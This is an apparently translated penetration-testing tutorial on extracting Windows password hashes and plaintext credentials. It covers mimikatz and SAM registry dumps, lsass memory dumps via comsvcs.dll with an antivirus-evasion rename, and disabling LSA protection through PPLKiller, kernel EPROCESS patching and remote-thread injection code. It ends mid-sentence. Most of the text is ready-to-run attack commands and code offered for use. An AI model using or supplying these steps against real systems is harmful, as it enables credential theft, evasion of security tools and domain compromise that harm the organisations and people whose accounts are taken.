Title: Intranet penetration and export HASH summary

Get the plaintext password of the current machine

Before exporting the domain hash, we can first try to export the local hash password of the current machine. If the domain user logs in on this machine before, he can directly obtain the account of the domain user or even the domain administrator.

On the Windows operating system, the sam database (C:\Windows\System32\config\sam) saves the hash of the local user.

In the local authentication process, as the local security permission service process lsass.exe will also cache the user password in memory (dmp file).

Therefore, here we can consider two ways to crawl the hash of the current machine: online tool extraction and offline analysis extraction.

Note: In the system version after Windows 10\ 2012r2, the system user's plaintext password is disabled by default in the memory cache. At this time, you can use mimikatz to catch plaintext, and you will definitely not be able to catch it. Password field digits will be displayed directly as null.

Here we manually modify the registry to save the plain text, so that we can crawl. (After modifying, you need to log out of the user before logging in)

reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG\_DWORD /d 1 /f

mimikatz

mimikatz is a powerful lightweight debugging tool developed by the Frenchman benjamin. It is intended for personal testing, but because of its powerful function, it can directly read the plaintext passwords of operating systems such as Windows XP-2012 and is famous for penetration testing. It can be said to be a necessary tool for penetration.

Download address: https://github.com/gentilkiwi/mimikatz

1. Crawl hash through the registry

Execute the command line to get the SAM and SYSTEM files of the current system registry (requires local administrator rights)

reg save HKLM\\SYSTEM Sys.hiv

reg save HKLM\\SAM Sam.hiv

After obtaining the file, you can download it to the attacker's native machine and use mimikatz to analyze and extract hash offline.

mimikatz.exe 'lsadump:sam /sam:Sam.hiv /system:Sys.hiv' 'exit'

This method can only obtain the account of the local user saved in the SAM file

2. Upload mimikatz into the target machine and extract the account hash value saved by the local SAM file online

privilege:debug

token:elevate

lsadump:sam

3. Extend the hash from the memory of lsass.exe

mimikatz 'privilege:debug' 'sekurlsa:logonpasswords full' 'exit'

It was found that the hash value of the domain administrator logged in to the local user was captured using the administrator permissions of the local user.

pwdump7

Just run PwDump7.exe directly

WEC

Upload to the target machine and add parameters to run directly.

-l List login session and NTLM credentials (default)

-s Modify the NTLM credentials of the current login session Parameters: Username : Domainname :LM hash :NT hash

-r Regularly list logged-in sessions and NTLM credentials. If a new session is found, it will be relisted every 5 seconds.

-c Run a new session with a special NTML credentials Parameters:

-e List login sessions and NTLM credentials from time to time, and relist them once when a login event is generated

-o Save all outputs to a file Parameter : file name

-i Specify a LUID instead of using the current login session Parameter :

-d Delete NTLM credentials from login session Parameter :

-a Use address Parameter : Address

-f Force safe mode

-g Generate hashings for LM and NT Parameter password

-K cache kerberos tickets to a file (unix and windows wce formats)

-k Read kerberos tickets from a file and insert them into windows cache

-w cache a plaintext password through digest authentication

-v Detailed output

laZagne

Download address: https://github.com/AlessandroZ/LaZagne

LaZagne.exe all

SharpDump

https://github.com/GhostPack/SharpDump

Just compile it directly

./Sharpdump

LsassSilentProcessExit

https://mp.weixin.qq.com/s/8uEr5dNaQs24KuKxu5Yi9w

Silent Process Exit, that is, silently exit. This debugging technology can derive the werfault.exe process, which can be used to run any program or to relocate memory files or pop-ups of any process.

Mainly use the LsassSilentProcessExit API, which dumps memory by modifying the registry + remote process injection, and the related registry key values:

#define IFEO\_REG\_KEY 'SOFTWARE\\\\\\Microsoft\\\\\\Windows NT\\\\\CurrentVersion\\\\\Image File Execution Options\\\\\'

#define SILENT\_PROCESS\_EXIT\_REG\_KEY 'SOFTWARE\\\\\\Microsoft\\\\\\Windows NT\\\\\CurrentVersion\\\\\\SilentProcessExit\\\\\'

Use remote process injection to let lsass.exe call the RtlReportSilentProcessExit function itself:

HMODULE hNtdll=GetModuleHandle(L'ntdll.dll');

RtlReportSilentProcessExit\_func RtlReportSilentProcessExit=(RtlReportSilentProcessExit\_func)GetProcAddress(hNtdll, 'RtlReportSilentProcessExit');

HANDLE hThread=CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD\_START\_ROUTINE)RtlReportSilentProcessExit, (LPVOID)-1, NULL, NULL);

However, since the registry needs to be modified, it is almost impossible to bypass the soft-killing environment.

LsassSilentProcessExit.exe 616 0

How to dump lsass processes in sensitive environments

Use powershell to export without file

https://blog.csdn.net/chenfeng857/article/details/120126818

https://xz.aliyun.com/t/12157#toc-9

comsvcs.dll, comes with the system. Implement dump memory through the export function MiniDump of comsvcs.dll.

When dumping the specified process memory file, SeDebugPrivilege permission is required. Under the cmd of administrator permissions, SeDebugPrivilege permission is supported by default, but the status is Disabled disabled.

If you directly execute the rundll32 command under cmd and try to dump the specified process memory file, the dump will fail because the SeDebugPrivilege permission cannot be enabled.

However, under powershell with administrator privileges, SeDebugPrivilege permission is supported by default, and the status is enabled.

First check the lsass.exe process PID

tasklist | findstr lsass.exe

rundll32.exe comsvcs.dll MiniDump PID Path full

rundll32.exe comsvcs.dll MiniDump 1096 C:\\Users\\16229\\Desktop\\1.dmp full

If you run it directly, you may be intercepted by Killing Soft.

A simple way to bypass it:

copycomsvcs.dll to insensitive directories and randomly named, for example test.dll

copy C:\\windows\\System32\\comsvcs.dll test.dll

rundll32.exe C:\\Users\\16229\\Desktop\\code\_java\\test.dll MiniDump 1096 C:\\Users\\16229\\Desktop\\code\_java\\3.dmp full

Drag to locally and use mimikatz for analysis.

mimikatz.exe log 'sekurlsa:minidump 2.dmp' 'sekurlsa:logonPasswords full' exit

In the environment where runasppl is enabled

https://www.freebuf.com/articles/system/332506.html

https://xz.aliyun.com/t/12157#toc-19

mimikatz

With PPL protection enabled, even administrators cannot open the lsass process.

mimikatz 'privilege:debug' 'sekurlsa:logonpasswords full' 'exit'

The command in Mimikatzprivilege:debug is successfully enabled; SeDebugPrivilege, but the command sekurlsa:logonpasswords failed and the error code0x00000005 appears. From the minikatz code kuhl_m_sekurlsa_acquireLSA() function, we can simply understand it as

HANDLE hData=NULL;

DWORD pid;

DWORD processRights=PROCESS_VM_READ | PROCESS_QUERY_INFORMATION;

kull_m_process_getProcessIdForName(L'lsass.exe', pid);

hData=OpenProcess(processRights, FALSE, pid);

if (hData hData !=INVALID_HANDLE_VALUE) {

//if OpenProcess OK

}

else {

PRINT_ERROR_AUTO(L'Handle on memory');

}

Use process explorer to open the lsass process to view, and access is denied.

Use digitally signed drivers in Mimikatz to remove protection flags for Process objects in kernel

Minikatz install driver

privilege:debug

!+

Delete protection

!processprotect /process:lsass.exe /remove

Then you can dump the password

sekurlsa:logonpasswords

Use the tool to view the protection has been deleted

mimikatz.exe 'privilege:debug' '!+' '!processprotect /process:lsass.exe /remove' 'sekurlsa:logonpasswords' 'exit'

PPLKILLER

https://www.cnblogs.com/revercc/p/16961961.html

https://redcursor.com.au/bypassing-lsa-protection-aka-protected-process-light-without-mimikatz-on-windows-10/

Priority Difference: A PP can open a PP or PPL with full access permissions as long as its signature level is greater than or equal to; a PPL can open another PPL with full access permissions as long as its signature level is greater than or equal to; no matter the signature level, a PPL cannot open a PP with full access permissions.

With PPL enabled, only processes running at a higher protection level can operate on protected processes.

The Windows kernel uses the _EPROCESS structure to represent processes in kernel memory, which includes a _PS_PROTECTION field that defines the protection level of the process through its Type (_PS_PROTECTED_TYPE) and Signer (_PS_PROTECTED_SIGNER) properties.

typedef struct _PS_PROTECTION {

union {

UCHAR Level;

struct {

UCHAR Type : 3;

UCHAR Audit : 1; //Reserved

UCHAR Signer : 4;

};

};

} PS_PROTECTION, *PPS_PROTECTION;

Although it is represented as a struct, all information is stored in two nibble of a single byte (Levelis a UCHAR, an unsigned char). The first 3 digits indicate the protection Type (see PS_PROTECTED_TYPE below). It defines whether the process is PP or PPL. The last 4 digits represent the Signer type (see PS_PROTECTED_SIGNER below), that is, the actual protection level.

typedef enum _PS_PROTECTED_TYPE {

PsProtectedTypeNone=0,

PsProtectedTypeProtectedLight=1,

PsProtectedTypeProtected=2

} PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE;

typedef enum _PS_PROTECTED_SIGNER {

PsProtectedSignerNone=0, //0

PsProtectedSignerAuthenticode, //1

PsProtectedSignerCodeGen, //2

PsProtectedSignerAntimalware, //3

PsProtectedSignerLsa, //4

PsProtectedSignerWindows, //5

PsProtectedSignerWinTcb, //6

PsProtectedSignerWinSystem, //7

PsProtectedSignerApp, //8

PsProtectedSignerMax //9

} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;

If we want to bypass LSA protection, we can disable the PPL flag on the LSASS process by patching the EPROCESS kernel structure. To do this, we need to find the address of the LSASS EPROCESS structure and patch 5 values: SignatureLevel, SectionSignatureLevel, Type, Audit, and Signer to zero.

The EnumDeviceDrivers function can be used to leak kernel base addresses. This can be used to locate the PsInitialSystemProcess, which points to the EPROCESS structure of the system process. Since the kernel stores processes in linked lists, it is possible to use ActiveProcessLinks members of the EPROCESS structure to iterate over the linked list and look for LSASS.

Looking at the EPROCESS structure, we can see that the 5 fields we need to patch are aligned as conventionally 4 bytes. This allows us to patch the EPROCESS structure in a single 4-byte write as follows: WriteMemoryPrimitive(Device, 4, CurrentProcessAddress + SignatureLevelOffset,0x00);

After finding the address, just patch the values of these four bytes to zero.

PPLKiller.exe /installDriver

tasklist | findstr lsass.exe

PPLKiller.exe /disablePPL 688

If you encounter different kernel versions, the program cannot patch the four bytes correctly, you can find the same version of the machine and view the lsass kernel address through windbg debugging.

bcdedit /debug onsrv\*https://msdl.microsoft.com/download/symbols

.reload

!process 0 0 lsass.exe

dt \_eprocess

Find address0x6c0, modify the script and then compile it.

PPLdump

https://itm4n.github.io/the-end-of-ppldump/

https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/

PPLdump is a tool written in C/C++ that implements user-state vulnerability exploitation, injecting arbitrary code into PPL as an administrator. This technology is one of many findings by Alex Ionescu and James Forshaw to conduct in-depth research on protected processes (PP and PPL).

The working principle of PPLdump is as follows:

Call AP